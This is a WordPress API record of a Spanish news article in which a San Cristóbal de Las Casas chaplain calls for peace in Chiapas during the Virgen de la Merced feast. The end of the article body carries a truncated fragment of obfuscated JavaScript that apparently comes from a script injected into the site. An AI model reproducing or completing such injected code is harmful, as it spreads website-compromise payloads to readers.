{"id":17981,"date":"2024-09-23T02:35:36","date_gmt":"2024-09-23T02:35:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17981"},"modified":"2024-09-23T02:35:38","modified_gmt":"2024-09-23T02:35:38","slug":"mercedarios-se-unen-al-llamado-de-paz-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17981","title":{"rendered":"Mercedarios se unen al llamado de paz en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"646\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-22-at-4.27.46-PM-2-1024x646.jpeg\" alt=\"\" class=\"wp-image-17982\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-22-at-4.27.46-PM-2-1024x646.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-22-at-4.27.46-PM-2-300x189.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-22-at-4.27.46-PM-2-768x485.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-22-at-4.27.46-PM-2.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Jos\u00e9 Bartolom\u00e9 G\u00f3mez Mart\u00ednez, capell\u00e1n del templo de La Merced, hizo un llamado a la paz para todo el estado de Chiapas, ya que hay parroquias que son v\u00edctimas de la violencia, derivado de la operaci\u00f3n de grupos delictivos en diferentes partes de la entidad, as\u00ed como comunidades que est\u00e1n siendo desplazadas por la inseguridad.<\/p>\n\n\n\n<p>Durante el tradicional anuncio de la Virgen de la Merced, el capell\u00e1n aprovech\u00f3 para mandar un mensaje de paz, &#8220;en toda la celebraci\u00f3n de la virgen hemos pedido por la paz, &#8220;tenemos parroquias que son v\u00edctimas del narcotr\u00e1fico, ojal\u00e1 que podamos hacer algo desde los medios de comunicaci\u00f3n, el llamado es a la paz en todo Chiapas&#8221;<\/p>\n\n\n\n<p>Sobre la celebraci\u00f3n de la Virgen de la Merced, dijo que empezaron desde principios de septiembre y la participaci\u00f3n en el &#8220;anuncio&#8221; fue mayor por ser d\u00eda domingo, &#8220;es la forma que tiene la gente de manifestar su devoci\u00f3n por la virgen de La Merced es el mes mercedario, ahora es el anuncio, luego hay una serenata, ma\u00f1ana es la fiesta de maitines desde las 4:30 de la ma\u00f1ana tenemos actividades hasta la medianoche&#8221;.<\/p>\n\n\n\n<p>&#8220;El mero d\u00eda que es el tenemos muchas actividades, hay misas pr\u00e1cticamente todo el d\u00eda, pero principalmente queremos tocar el tema de la paz, porque tenemos muchas parroquias que han sido v\u00edctimas de la violencia&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Jos\u00e9 Bartolom\u00e9 G\u00f3mez Mart\u00ednez, capell\u00e1n del templo de La Merced, hizo un llamado a la paz para todo el estado de Chiapas, ya que hay parroquias que son v\u00edctimas de la violencia, derivado de la operaci\u00f3n de grupos delictivos en diferentes partes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17982,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17981","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17981"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17981\/revisions"}],"predecessor-version":[{"id":17983,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17981\/revisions\/17983"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17982"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17981"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17981"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}